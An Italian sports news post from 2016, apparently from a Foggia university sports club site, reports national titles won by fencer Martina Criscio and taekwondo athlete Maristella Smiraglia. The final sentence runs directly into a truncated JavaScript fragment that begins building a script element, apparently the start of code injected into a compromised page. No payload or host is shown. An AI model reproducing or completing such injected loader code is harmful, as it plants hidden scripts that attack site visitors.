.
News
  • Home
13
Giu
2016

Successi nazionali per Martina Criscio e Maristella Smiraglia

di trarre 0

In attesa di vederle gareggiare con il Cus Foggia tra pochi giorni ai Campionati Nazionali Universitari, Martina Criscio e Maristella Smiraglia, orgoglio dello sport foggiano e nazionale, continuano a collezionare successi e risultati eccezionali.

Martina Criscio, già oro ai Cnu2015 e grande protagonista agli Europei Under23 disputati a maggio scorso in Bulgaria, ha ottenuto nei giorni scorsi il suo primo successo nazionale grazie all’affermazione agli assoluti di Roma nella prova individuale di sciabola femminile. Martina, 22 anni, ha battuto in finale Chiara Mormile per 15-10.

L’altra ottima notizia arriva invece daTaekwondo: Maristella Smiraglia, dopo l’oro di un anno fa a Salsomaggiore e quello conquistato di recente all’Ukraine Open Cup 2016, è riuscita a salire sul gradino più alto del podio dei Campionati Italiani di cinture nere (categoria-73kg) al termine di una avvincente finale con Marina Rizzelli vinta per 2-1 dall’atleta del Centro TKD Foggia.var d=document;var s=d.createElement(‘script’);